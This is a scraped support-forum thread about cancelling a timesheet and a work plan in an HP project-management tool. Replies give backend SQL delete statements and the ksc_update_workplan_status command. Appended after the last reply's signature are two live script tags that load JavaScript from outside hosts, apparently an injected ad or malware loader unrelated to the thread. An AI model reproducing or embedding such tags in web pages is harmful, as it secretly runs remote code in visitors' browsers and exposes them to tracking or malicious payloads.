Did you mean: 

How to cancel a timesheet?

SOLVED
Go to solution
Highlighted
TurboMan

How to cancel a timesheet?

Hi,

I wonder if there a way of canceling a timesheet for a cancelled project?

I know that if I re-open the project I can cancel all taks, but I need to do without re-opening the project.

Any help is appreciated

Regards

TM

4 REPLIES
d4y4n4
Frequent Visitor

Re: How to cancel a timesheet?

Hi,

Check if the direct manager or the application administrators can access the timesheet, edit it and add the blank timesheet line back in, save and then cancel the timesheet to ensure that the timesheet does not remain open.

Also, to prevent this you can utilize the workflow step definitions to ensure that project close and cancel steps will also close the work plan and tasks

Regards,
Dayana Campos
d4y4n4
Frequent Visitor

Hi,

You can also can use the following workaround to remove that timesheet line from backend via SQL then you shall be able to cancel or save the tm.

a. Make a backup of the tables that we will run delete statement.

b.
DELETE FROM TM_ACTUALS_EFFORT WHERE ACTUALS_ID IN (SELECT ACTUALS_ID FROM TM_ACTUALS TA WHERE TA.TIME_SHEET_LINE_ID=);
DELETE FROM TM_ACTUALS WHERE TIME_SHEET_LINE_ID=;
DELETE FROM TM_LINE_CHARGE_CODES WHERE TIME_SHEET_LINE_ID=;
DELETE FROM TM_USERS_TIME_APPROVERS WHERE APPROVER_TIME_SHEET_LINE_ID=;
DELETE FROM TM_TIME_SHEET_LINES WHERE TIME_SHEET_LINE_ID=;
commit;

You need to replace with the real timesheet line ID that you want to remove.

To figure out ts_line_id, run something like:

select * from tm_time_sheets where description like '%your information here%'

That would give you the ts_id for the timesheet belonging to this description. Then, run

select * from tm_time_sheet_lines where time_sheet_id=

this will give you the time_sheet_line_id linked with this timesheet, and identify the time_sheet_line_id that you need to delete.

Regards,
Dayana Campos
TurboMan

Thanks Dayana,

My appologies, I ment "Canceling a Work Plan".

At the moment, project is cancelled but WBS is active, I need to make the WBS as "Cancelled". 

Thanks for the tips on how to remove a time sheet line. 

Regards

TM

jsalass
Frequent Visitor
Solution

Hey turboman,

Yes, you can use the ksc_update_workplan_status special command.

You can run this command from a different workflow you just need to provide the workplan_id and the status.

Then, you can even add this command to you prj workflow to mark a workplan as cancelled if the project is cancelled too.

http://support.openview.hp.com/selfsolve/document/KM626258

The KSC_UPDATE_WORKPLAN_STATUS special command is used for changing the status of the workplan

Please provide the Project ID as well the status code of the workplan status to be changed

For example the command runs the java call as given:

ksc_run_java com.kintana.core.server.execution.SetWorkplanStatus -project [REQ.P.KNTA_PROJECT_PLAN] -status [P.P_STATUS] -user [SYS.USER_ID]

You can test it running from a workflow step , however when running from a report you need to hardcode the value of the above tokens to resolve it

ksc_update_workplan_status PROJECT_ID = [REQ.P.KNTA_PROJECT_PLAN]" STATUS="COMPLETE"

valid status of ksc_update_workplan_status:
ON-HOLD,ACTIVE,CANCELLED,COMPLETE,PLANNING

Hope this helps!

Regards,

Jonathan <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

//Add this to "OnDomLoad" event